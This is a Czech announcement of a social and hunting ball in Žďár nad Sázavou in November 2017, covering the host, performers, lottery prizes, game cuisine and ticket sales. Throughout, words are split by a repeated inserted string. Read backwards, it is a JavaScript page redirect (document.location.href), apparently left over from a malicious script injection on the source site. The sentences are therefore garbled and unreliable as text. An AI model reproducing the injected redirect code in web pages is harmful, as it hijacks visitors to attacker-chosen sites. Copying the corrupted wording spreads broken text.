Rainbow page separator

Aleš Háma Vás provede Společenským a trochu mysliveckým plesem

Pátek, 17. listopadu 2017

Žďár nad Sázavou / Vážení čtenáři, srdečně vás zveme na Společenský a trochu myslivecký ples, který se uskuteční 18. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu 2017 v Domě kultury ve Žďáře nad Sázavou.
Plesem vás bude provázet herec, zpěvák, muzikant a moderá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor Aleš Háma, několikrát vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí skupina Hamleti (Aleš Háma, Dalibor Gondík, Jakub Wehrenberg, Hardi Marzuki).
Dále se můžete těšit na Marcelu Holanovou, k tanci a poslechu bude hrát skupina Kvatro.
Společenská událost dále nabízí i hodně boha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tombolu, kde hlavní cenou je víkendový pobyt a let balonem pro dvě osoby v Balonovém hotelu v Radešíně, dále Sporten lyže v hodnotě 5000 Kč a poukaz na okna či dveře v hodnotě 5000 Kč od firmy PKS okna.

Na své si přijdou i milovníci zvěřiny. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tombole budou bažanti, zajíci, spárkatá zvěř a mnoho dalších hodnotných cen. Nedílnou součástí plesu je i pestrá a výborná zvěřinová kuchyně v podání Restaurace Tisůvka.

Zakoupit vstupenky lze ve žďárském Domě kultury od pondělí do středy od 13 do 17 hodin. Dále v informačním centru Žďár nad Sázavou, Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě, Bystřice nad Pernštejnem, Přibyslav, Papírnictví Linda v Polné a v Balonovém hotelu v Radešíně.

Cena vstupenky je 290 Kč. Více informací k plesu na telefonním čísle 732 185 199.
Na vaši účast se těší pořadatelé.
PRO Strachujov, z.s.